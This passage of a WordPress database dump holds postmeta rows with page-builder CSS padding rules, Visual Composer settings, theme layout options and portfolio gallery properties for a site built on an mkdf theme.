!important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53324,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53325,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53326,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53327,1857,'_wp_page_template','full-width.php'),(53328,1857,'slide_template','default'),(53329,1857,'_wpb_vc_js_status','true'),(53330,1857,'mkdf_page_content_behind_header_meta','no'),(53331,1857,'mkdf_disable_vertical_header_background_image_meta','no'),(53332,1857,'mkdf_disable_header_widget_areas_meta','no'),(53333,1857,'mkdf_page_content_padding','0'),(53334,1857,'_dp_original','1852'),(53335,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53336,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(53337,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53338,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53339,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53340,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53341,3074,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53342,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(53343,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(53344,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(53345,3074,'_wpb_shortcodes_custom_css','.vc_custom_1535124101038{padding-top: 120px !important;padding-bottom: 60px !important;}.vc_custom_1534926481959{padding-top: 4px !important;}'),(53346,3074,'_wp_page_template','full-width.php'),(53347,3074,'slide_template','default'),(53348,3074,'_wpb_vc_js_status','true'),(53349,3074,'mkdf_page_content_behind_header_meta','no'),(53350,3074,'mkdf_disable_vertical_header_background_image_meta','no'),(53351,3074,'mkdf_disable_header_widget_areas_meta','no'),(53352,3074,'mkdf_page_content_padding','120px 0 60px'),(53353,3074,'_dp_original','1382'),(53354,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53355,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53356,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53357,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53358,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53359,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53360,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53361,1948,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53362,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53363,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53364,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53365,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53366,1948,'_wpb_shortcodes_custom_css','.vc_custom_1524046525458{padding-top: 82px !important;}.vc_custom_1524046534094{padding-top: 55px !important;padding-bottom: 47px !important;}.vc_custom_1524047631684{padding-top: 50px !important;padding-bottom: 63px !important;}.vc_custom_1534931904860{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1534931913572{margin-bottom: 23px !important;border-right-width: 1px !important;padding-top: 0px !important;padding-bottom: 12px !important;border-right-color: #a1a1a1 !important;border-right-style: solid !important;}.vc_custom_1516615394313{margin-bottom: 23px !important;padding-top: 0px !important;padding-bottom: 12px !important;}'),(53367,1948,'_wp_page_template','full-width.php'),(53368,1948,'slide_template','default'),(53369,1948,'_wpb_vc_js_status','true'),(53370,1948,'mkdf_page_content_behind_header_meta','no'),(53371,1948,'mkdf_disable_vertical_header_background_image_meta','no'),(53372,1948,'mkdf_disable_header_widget_areas_meta','no'),(53373,1948,'mkdf_page_content_padding','105px 0 60px'),(53374,1948,'_dp_original','1904'),(53375,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53376,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53377,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53378,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53379,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53380,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53381,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53382,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53383,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53384,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53385,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53386,1995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53387,1995,'_wp_page_template','full-width.php'),(53388,1995,'slide_template','default'),(53389,1995,'_wpb_vc_js_status','true'),(53390,1995,'mkdf_page_content_behind_header_meta','no'),(53391,1995,'mkdf_disable_vertical_header_background_image_meta','no'),(53392,1995,'mkdf_disable_header_widget_areas_meta','no'),(53393,1995,'mkdf_page_content_padding','0'),(53394,1995,'_dp_original','1857'),(53395,1995,'_wpb_shortcodes_custom_css','.vc_custom_1535012679341{padding-top: 105px !important;padding-bottom: 90px !important;}.vc_custom_1535469268578{padding-top: 105px !important;padding-bottom: 90px !important;}'),(53396,2019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53397,2019,'_wp_page_template','full-width.php'),(53398,2019,'slide_template','default'),(53399,2019,'_wpb_vc_js_status','true'),(53400,2019,'mkdf_page_content_behind_header_meta','no'),(53401,2019,'mkdf_disable_vertical_header_background_image_meta','no'),(53402,2019,'mkdf_disable_header_widget_areas_meta','no'),(53403,2019,'_wpb_shortcodes_custom_css','.vc_custom_1535019332070{padding-top: 43px !important;padding-bottom: 100px !important;}'),(53404,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53405,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(53406,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53407,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53408,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53409,2174,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53410,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(53411,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(53412,2174,'_wpb_shortcodes_custom_css','.vc_custom_1535640172692{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535443981371{padding-top: 85px !important;padding-bottom: 50px !important;}.vc_custom_1535467877810{padding-top: 85px !important;padding-bottom: 50px !important;}'),(53413,2174,'_wp_page_template','full-width.php'),(53414,2174,'slide_template','default'),(53415,2174,'_wpb_vc_js_status','true'),(53416,2174,'mkdf_page_content_behind_header_meta','no'),(53417,2174,'mkdf_disable_vertical_header_background_image_meta','no'),(53418,2174,'mkdf_disable_header_widget_areas_meta','no'),(53419,2174,'mkdf_page_content_padding','120px 0'),(53420,2174,'_dp_original','1297'),(53421,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53422,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53423,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53424,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53425,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53426,2387,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53427,2387,'_wp_page_template','full-width.php'),(53428,2387,'slide_template','default'),(53429,2387,'_wpb_vc_js_status','true'),(53430,2387,'mkdf_page_content_behind_header_meta','no'),(53431,2387,'mkdf_disable_vertical_header_background_image_meta','no'),(53432,2387,'mkdf_disable_header_widget_areas_meta','no'),(53433,2387,'mkdf_page_content_padding','120px 0 100px'),(53434,2387,'_dp_original','1382'),(53435,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53436,2419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53437,2419,'_wp_page_template','blog-standard'),(53438,2419,'slide_template','default'),(53439,2419,'_wpb_vc_js_status','false'),(53440,2419,'mkdf_page_content_behind_header_meta','no'),(53441,2419,'mkdf_blog_category_meta','recepies'),(53442,2419,'mkdf_show_posts_per_page_meta','5'),(53443,2419,'mkdf_sidebar_layout_meta','sidebar-25-left'),(53444,2419,'mkdf_disable_vertical_header_background_image_meta','no'),(53445,2419,'mkdf_disable_header_widget_areas_meta','no'),(53446,2419,'mkdf_page_content_padding','120px 0 100px'),(53447,2419,'_dp_original','1679'),(53448,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53449,2421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53450,2421,'_wp_page_template','blog-standard'),(53451,2421,'slide_template','default'),(53452,2421,'_wpb_vc_js_status','false'),(53453,2421,'mkdf_page_content_behind_header_meta','no'),(53454,2421,'mkdf_blog_category_meta','recepies'),(53455,2421,'mkdf_show_posts_per_page_meta','5'),(53456,2421,'mkdf_sidebar_layout_meta','no-sidebar'),(53457,2421,'mkdf_disable_vertical_header_background_image_meta','no'),(53458,2421,'mkdf_disable_header_widget_areas_meta','no'),(53459,2421,'mkdf_page_content_padding','120px 0 100px'),(53460,2421,'_dp_original','1679'),(53461,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53462,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53463,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53464,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53465,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53466,2435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53467,2435,'_wp_page_template','full-width.php'),(53468,2435,'slide_template','default'),(53469,2435,'_wpb_vc_js_status','true'),(53470,2435,'mkdf_page_content_behind_header_meta','no'),(53471,2435,'mkdf_disable_vertical_header_background_image_meta','no'),(53472,2435,'mkdf_disable_header_widget_areas_meta','no'),(53473,2435,'mkdf_page_content_padding','120px 0 0'),(53474,2435,'_dp_original','1742'),(53475,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53476,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53477,2448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53478,2448,'_wp_page_template','full-width.php'),(53479,2448,'slide_template','default'),(53480,2448,'_wpb_vc_js_status','true'),(53481,2448,'mkdf_page_content_behind_header_meta','no'),(53482,2448,'mkdf_page_content_padding','0 0 0 0 '),(53483,2448,'mkdf_page_content_padding_mobile','0 0 0 0'),(53484,2448,'mkdf_set_menu_area_position_meta','center'),(53485,2448,'mkdf_disable_vertical_header_background_image_meta','no'),(53486,2448,'mkdf_menu_area_background_color_meta','#ffffff'),(53487,2448,'mkdf_menu_area_background_transparency_meta','40%'),(53488,2448,'mkdf_disable_header_widget_areas_meta','no'),(53489,2448,'mkdf_show_title_area_meta','no'),(53490,2448,'mkdf_disable_footer_meta','yes'),(53491,2448,'mkdf_header_type_meta','header-standard'),(53492,2448,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(53493,2448,'mkdf_header_behaviour_meta','no-behavior'),(53494,2448,'_dp_original','1811'),(53495,2448,'_wpb_shortcodes_custom_css','.vc_custom_1535553249523{padding-top: 100px !important;padding-bottom: 100px !important;background-color: #e7dfdf !important;}'),(53496,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53497,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53498,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53499,2457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53500,2457,'_wp_page_template','default'),(53501,2457,'slide_template','default'),(53502,2457,'_wpb_vc_js_status','true'),(53503,2457,'mkdf_page_content_behind_header_meta','no'),(53504,2457,'mkdf_page_content_padding','100px 0 120px 0'),(53505,2457,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(53506,2457,'mkdf_disable_vertical_header_background_image_meta','no'),(53507,2457,'mkdf_disable_header_widget_areas_meta','no'),(53508,2457,'mkdf_title_area_type_meta','attika'),(53509,2457,'_dp_original','1185'),(53510,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53511,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53512,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53513,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53514,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53515,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53516,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53517,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53518,2472,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53519,2472,'_wp_page_template','full-width.php'),(53520,2472,'slide_template','default'),(53521,2472,'_wpb_vc_js_status','true'),(53522,2472,'mkdf_page_content_behind_header_meta','no'),(53523,2472,'mkdf_disable_vertical_header_background_image_meta','no'),(53524,2472,'mkdf_disable_header_widget_areas_meta','no'),(53525,2472,'mkdf_page_content_padding','120px 0 105px'),(53526,2472,'_dp_original','1662'),(53527,2472,'_wpb_shortcodes_custom_css','.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1535626950960{margin-top: -60px !important;}.vc_custom_1535627671543{padding-top: 160px !important;padding-bottom: 120px !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535632790817{padding-right: 10% !important;padding-left: 10% !important;}.vc_custom_1535119322528{margin-top: -20px !important;}'),(53528,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53529,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53530,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53531,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53532,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53533,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53534,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53535,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53536,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53537,2477,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53538,2477,'_wp_page_template','full-width.php'),(53539,2477,'slide_template','default'),(53540,2477,'_wpb_vc_js_status','true'),(53541,2477,'mkdf_page_content_behind_header_meta','no'),(53542,2477,'mkdf_disable_vertical_header_background_image_meta','no'),(53543,2477,'mkdf_disable_header_widget_areas_meta','no'),(53544,2477,'mkdf_page_content_padding','120px 0 60px'),(53545,2477,'_dp_original','2472'),(53546,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53547,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(53548,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53549,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53550,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53551,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53552,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53553,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53554,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53555,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53556,2494,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53557,2494,'_wp_page_template','full-width.php'),(53558,2494,'slide_template','default'),(53559,2494,'_wpb_vc_js_status','true'),(53560,2494,'mkdf_page_content_behind_header_meta','no'),(53561,2494,'mkdf_disable_vertical_header_background_image_meta','no'),(53562,2494,'mkdf_disable_header_widget_areas_meta','no'),(53563,2494,'mkdf_page_content_padding','110px 0 155px'),(53564,2494,'_wpb_shortcodes_custom_css','.vc_custom_1535628318862{padding-bottom: 70px !important;}.vc_custom_1535629459423{padding-top: 60px !important;padding-bottom: 110px !important;background-color: #f9f5f0 !important;}.vc_custom_1535626873687{padding-right: 10% !important;padding-left: 10% !important;}'),(53565,2494,'_dp_original','2472'),(53566,2542,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53567,2542,'_wp_page_template','full-width.php'),(53568,2542,'slide_template','default'),(53569,2542,'_wpb_vc_js_status','true'),(53570,2542,'mkdf_page_content_behind_header_meta','no'),(53571,2542,'mkdf_disable_vertical_header_background_image_meta','no'),(53572,2542,'mkdf_disable_header_widget_areas_meta','no'),(53573,2542,'_wpb_shortcodes_custom_css','.vc_custom_1535962435703{padding-top: 80px !important;padding-bottom: 125px !important;}.vc_custom_1535967241855{padding-top: 50px !important;padding-bottom: 95px !important;}.vc_custom_1536937014058{margin-top: -15px !important;}.vc_custom_1537367428822{padding-top: 21% !important;padding-bottom: 18% !important;}'),(53574,2542,'mkdf_page_content_padding','0'),(53575,2542,'mkdf_disable_header_meta','yes'),(53576,2542,'mkdf_show_title_area_meta','no'),(53577,2542,'mkdf_disable_footer_meta','yes'),(53578,2542,'mkdf_smooth_page_transitions_meta','yes'),(53579,2542,'mkdf_page_transition_preloader_meta','yes'),(53580,2542,'mkdf_smooth_pt_spinner_type_meta','pulse'),(53581,2542,'mkdf_smooth_pt_spinner_color_meta','#000000'),(53582,2542,'_wpb_post_custom_css','.mkdf-landing-homes-section {\n    display: none;\n}\n\n.mkdf-landing-bottom-section:after {\n    position: absolute;\n    left: 0;\n    bottom: 0;\n    z-index: -23;\n    width: 29%;\n    height: 476px;\n    background-color: #fef8f7;\n}\n'),(53583,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53584,2625,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53585,2625,'_wp_page_template','default'),(53586,2625,'slide_template','default'),(53587,2625,'_wpb_vc_js_status','true'),(53588,2625,'mkdf_page_content_behind_header_meta','no'),(53589,2625,'mkdf_page_content_padding','120px 0 160px 0'),(53590,2625,'mkdf_page_content_padding_mobile','120px 0 160px 0'),(53591,2625,'mkdf_disable_vertical_header_background_image_meta','no'),(53592,2625,'mkdf_disable_header_widget_areas_meta','no'),(53593,2625,'mkdf_title_area_type_meta','attika'),(53594,2625,'_dp_original','1151'),(53595,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53596,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53597,2627,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53598,2627,'_wp_page_template','default'),(53599,2627,'slide_template','default'),(53600,2627,'_wpb_vc_js_status','true'),(53601,2627,'mkdf_page_content_behind_header_meta','no'),(53602,2627,'mkdf_page_content_padding','120px 0 170px 0'),(53603,2627,'mkdf_page_content_padding_mobile','120px 0 170px 0'),(53604,2627,'mkdf_disable_vertical_header_background_image_meta','no'),(53605,2627,'mkdf_disable_header_widget_areas_meta','no'),(53606,2627,'mkdf_title_area_type_meta','attika'),(53607,2627,'_dp_original','1182'),(53608,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53609,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53610,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53611,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53612,2646,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53613,2646,'_wp_page_template','default'),(53614,2646,'slide_template','default'),(53615,2646,'_wpb_vc_js_status','true'),(53616,2646,'mkdf_page_content_behind_header_meta','no'),(53617,2646,'mkdf_page_content_padding','100px 0 120px 0'),(53618,2646,'mkdf_page_content_padding_mobile','100px 0 120px 0'),(53619,2646,'mkdf_disable_vertical_header_background_image_meta','no'),(53620,2646,'mkdf_disable_header_widget_areas_meta','no'),(53621,2646,'mkdf_title_area_type_meta','attika'),(53622,2646,'_dp_original','2457'),(53623,2652,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53624,2652,'_wp_page_template','default'),(53625,2652,'slide_template','default'),(53626,2652,'_wpb_vc_js_status','true'),(53627,2652,'mkdf_page_content_behind_header_meta','no'),(53628,2652,'mkdf_disable_vertical_header_background_image_meta','no'),(53629,2652,'mkdf_disable_header_widget_areas_meta','no'),(53630,2652,'mkdf_disable_header_meta','yes'),(53631,2652,'mkdf_show_title_area_meta','no'),(53632,2652,'mkdf_disable_footer_meta','yes'),(53633,2652,'mkdf_page_content_padding','0'),(53634,3075,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53635,3075,'_thumbnail_id','121'),(53636,3075,'mkdf_page_content_behind_header_meta','no'),(53637,3075,'mkdf_page_content_padding','115px 0 100px 0'),(53638,3075,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53639,3075,'portfolio_single_back_to_link','81'),(53640,3075,'mkdf_disable_vertical_header_background_image_meta','no'),(53641,3075,'mkdf_disable_header_widget_areas_meta','no'),(53642,3075,'slide_template','default'),(53643,3075,'_wpb_vc_js_status','false'),(53644,3075,'mkdf-portfolio-image-gallery','1903,1902,1901'),(53645,3075,'mkdf_portfolio_single_template_meta','images'),(53646,3075,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53647,3075,'_wp_old_slug','h1-1'),(53648,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53649,3076,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53650,3076,'_thumbnail_id','137'),(53651,3076,'mkdf_page_content_behind_header_meta','no'),(53652,3076,'mkdf_page_content_padding','115px 0 100px 0'),(53653,3076,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53654,3076,'portfolio_single_back_to_link','81'),(53655,3076,'mkdf_disable_vertical_header_background_image_meta','no'),(53656,3076,'mkdf_disable_header_widget_areas_meta','no'),(53657,3076,'slide_template','default'),(53658,3076,'_wpb_vc_js_status','true'),(53659,3076,'_dp_original','104'),(53660,3076,'mkdf-portfolio-image-gallery','567,566,565'),(53661,3076,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John 